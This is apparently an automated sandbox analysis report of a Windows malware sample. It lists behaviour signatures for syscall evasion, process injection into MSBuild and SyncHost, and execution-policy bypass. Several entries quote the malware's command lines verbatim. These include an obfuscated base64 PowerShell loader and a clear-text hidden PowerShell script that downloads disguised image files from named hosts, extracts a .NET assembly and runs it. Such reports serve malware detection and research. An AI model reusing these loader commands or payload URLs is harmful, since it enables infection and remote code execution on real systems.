Bypasses PowerShell execution policy
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtResumeThread: Direct from: 0x773836AC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtMapViewOfSection: Direct from: 0x77382D1C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtWriteVirtualMemory: Direct from: 0x77382E3C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtProtectVirtualMemory: Direct from: 0x77382F9C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtSetInformationThread: Direct from: 0x773763F9 Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtCreateMutant: Direct from: 0x773835CC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtNotifyChangeKey: Direct from: 0x77383C2C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtSetInformationProcess: Direct from: 0x77382C5C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtCreateUserProcess: Direct from: 0x7738371C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtQueryInformationProcess: Direct from: 0x77382C26 Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtResumeThread: Direct from: 0x77382FBC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtWriteVirtualMemory: Direct from: 0x7738490C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtReadFile: Direct from: 0x77382ADC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtDelayExecution: Direct from: 0x77382DDC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtQuerySystemInformation: Direct from: 0x77382DFC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtOpenSection: Direct from: 0x77382E0C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtQuerySystemInformation: Direct from: 0x773848CC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtReadVirtualMemory: Direct from: 0x77382E8C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtCreateKey: Direct from: 0x77382C6C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtAllocateVirtualMemory: Direct from: 0x773848EC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtQueryAttributesFile: Direct from: 0x77382E6C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtSetInformationThread: Direct from: 0x77382B4C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtTerminateThread: Direct from: 0x77382FCC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtQueryInformationToken: Direct from: 0x77382CAC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtOpenKeyEx: Direct from: 0x77382B9C Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtDeviceIoControlFile: Direct from: 0x77382AEC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtCreateFile: Direct from: 0x77382FEC Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe NtOpenFile: Direct from: 0x77382DCC Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: NULL target: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Section loaded: NULL target: C:\Windows\SysWOW64\SyncHost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: NULL target: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: NULL target: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\SyncHost.exe Thread APC queued: target process: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6E3008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Process created: C:\Windows\SysWOW64\SyncHost.exe "C:\Windows\SysWOW64\SyncHost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredydgtrengdgtrevdgtredkdgtrenwdgtre4dgtrec8dgtrezgb1dgtregwdgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredgbidgtrehmdgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredidgtrenqdgtre4dgtredgdgtrendgtredgtre2dgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmd